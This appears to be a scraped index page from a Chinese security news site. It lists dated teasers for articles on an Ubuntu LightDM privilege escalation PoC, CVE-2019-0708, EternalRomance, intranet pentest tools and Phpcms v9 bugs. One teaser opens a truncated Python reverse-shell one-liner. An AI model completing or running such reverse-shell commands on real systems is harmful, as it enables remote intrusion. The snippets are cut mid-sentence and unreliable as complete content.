20 04月 行业热点 Ubuntu LightDM访客账户本地权限提升漏洞(含PoC) sbin/guest-account -rwxr-xr-x 1 root root 6516 Sep 29 18:56 /usr/sbin/guest-account @ubuntu:~$ dpkg -S
01 03月 行业热点 首次SHA-1碰撞攻击实现 只需5个聪明的大脑和6610年的处理器时间 攻击需要超过90亿亿次(没打错,是两个“亿” 9,223,372,036,854,775,808 )计算,等同于6500年的单个CPU时间和110年的单个GPU时间。
28 02月 行业热点 HTTPS及HTTPS中间人攻击 直接调用openssl库识别目标服务器支持的SSL/TLS cipher suite openssl s_client -connect www.baidu.com:443,
22 05月 行业热点 漏洞原理CVE-2019-0708-PoC-Hitting-Path Windows Server 2008 R2和Windows Server 2008相关补丁更新可以参考《Microsoft安全更新指南》,访问地址:https://portal.msrc.microsoft.com
20 04月 行业热点 Eternalromance (永恒浪漫) 漏洞分析 怎么定位某个MB_COM_TRANSACTION_SECONDARY数据包对应的SMB_COM_TRANSACTION数据包呢?重点里也提到了。
13 04月 行业热点 内网渗透的一些工具和平台汇总 【安全脉搏SecPulse.com加】 端口转发及代理类: 针对内网渗透,端口转发和代理是一个老司机必备的技能,只聊聊自己常用的fpipe,windows下面的端口转发软件,比较老牌的工具,使用场景有限
17 03月 行业热点 Linux渗透之反弹Shell命令解析 Python python -c import socket,subprocess,os; s=socket.socket(socket.AF_INET
06 03月 行业热点 一套实用的渗透测试岗位面试题,渗透测试的你会吗? 具体文章参见:http://ytxiao.lofter.com/post/40583a_ab36540。 22.上传大马后访问乱码时,有哪些解决办法?
17 04月 行业热点 Phpcms v9漏洞分析 ["content"]】这个参数,如下所示⤵️: ["content"]=> array(35) { ["fieldid"]=> string(2) "90